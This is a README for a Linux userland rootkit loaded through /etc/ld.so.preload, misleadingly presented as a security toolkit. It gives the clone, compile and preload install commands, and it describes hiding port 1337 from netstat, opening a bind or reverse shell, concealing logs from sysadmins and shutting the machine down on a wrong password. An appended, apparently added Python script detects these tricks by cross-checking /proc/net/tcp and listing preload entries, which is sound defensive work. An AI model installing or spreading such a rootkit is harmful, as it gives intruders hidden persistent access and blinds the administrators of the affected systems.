Welcome to my userland rootkit. This toolkit offers some cool and interesting functionalities designed to enhance your digital security. Let's dive into what it can do.
- git clone:
git clone https://github.com/DARKSECshell/ROOTKIT-USERLAND
- compile the userland rootkit as a shared library:
gcc DRK.c -o DRK.so -shared -fPIC -ldl
- register the library in /etc/ld.so.preload so the dynamic loader maps it into every new process:
echo "$(pwd)/DRK.so" > /etc/ld.so.preload && ldconfig
- check that the rootkit is loaded (DRK.so should show up in the output):
ldd /usr/bin/ls
When the digital attacker issues the command to kill port 1337, an interesting sequence of events unfolds:
- Password Prompt: Upon attempting to kill port 1337, the rootkit will prompt for a password.
- Password Verification: If the provided password matches the expected one, the rootkit will proceed to the next step.
- Incorrect Password Handling: If the password provided does not match the expected one, the machine will initiate a shutdown process.
But what happens if the correct password is entered?
- Port 1337 Hiding: The rootkit will stealthily hide port 1337 from detection. Even tools like `netstat` (and possibly `ss` in the future) will be deceived.
- Bind Shell Activation: Additionally, the rootkit will activate a bind shell on the local machine. While firewalls may attempt to block it, the user will have the option to choose between a reverse shell or a bind shell.
- Log Concealment: The rootkit ensures that commands like `tail` will have no effect. Sysadmins won't be able to spot suspicious activity in logs, nor will they be able to use other tools to inspect them.
- Future Plans: Looking ahead, I'm considering further enhancements to make the rootkit even more stealthy. For instance, I'm contemplating hiding `/etc/ld.so.preload` to minimize suspicion from sysadmins.
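As a defender's counterpart to the behaviour described above, here is an added example (not code from this project) that cross-checks the kernel's own socket table against what a userland tool such as `netstat` reports, and lists whatever is registered in /etc/ld.so.preload. The /proc/net/tcp snapshot, the preload file contents and the /opt/DRK.so path are constructed sample data.

```python
# Added example (not part of the original project): a defender's cross-view
# check for the two tricks this README describes, i.e. an entry planted in
# /etc/ld.so.preload and a listening port hidden from userland tools.
# All sample inputs below are constructed for illustration.

TCP_LISTEN = "0A"  # state value the kernel prints in /proc/net/tcp for listeners

# Constructed /proc/net/tcp snapshot: listeners on 22, 1337 (0x0539) and 53,
# plus one established connection that must be ignored.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 00000000:0539 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12347 1 0000000000000000 100 0 0 10 0
   3: 0100007F:9C40 0100007F:0016 01 00000000:00000000 00:00000000 00000000  1000        0 12348 1 0000000000000000 20 4 30 10 -1
"""

# Constructed /etc/ld.so.preload content (path is a placeholder).
SAMPLE_PRELOAD = "# comment line\n/opt/DRK.so\n\n"


def listening_ports(proc_net_tcp_text: str) -> set[int]:
    """Parse the kernel's socket table and return every TCP listening port."""
    ports = set()
    for line in proc_net_tcp_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4 or fields[3] != TCP_LISTEN:
            continue
        _addr_hex, port_hex = fields[1].split(":")  # local_address is "ADDR:PORT" in hex
        ports.add(int(port_hex, 16))
    return ports


def hidden_ports(kernel_view: set[int], tool_view: set[int]) -> list[int]:
    """Ports the kernel reports as listening but a userland tool (netstat/ss) omits."""
    return sorted(kernel_view - tool_view)


def preload_entries(preload_text: str) -> list[str]:
    """Libraries named in ld.so.preload; any entry you did not put there is suspect."""
    return [l.strip() for l in preload_text.splitlines()
            if l.strip() and not l.strip().startswith("#")]


if __name__ == "__main__":
    # On a real host read /proc/net/tcp and /etc/ld.so.preload directly and build
    # tool_view from `ss -ltn` or `netstat -ltn`. A preloaded library can hook the
    # reads of any dynamically linked process, including this interpreter, so take
    # the readings with a statically linked tool or from rescue media.
    kernel = listening_ports(SAMPLE_PROC_NET_TCP)
    print("hidden ports:", hidden_ports(kernel, {22, 53}))  # -> [1337]
    print("preload entries:", preload_entries(SAMPLE_PRELOAD))  # -> ['/opt/DRK.so']
```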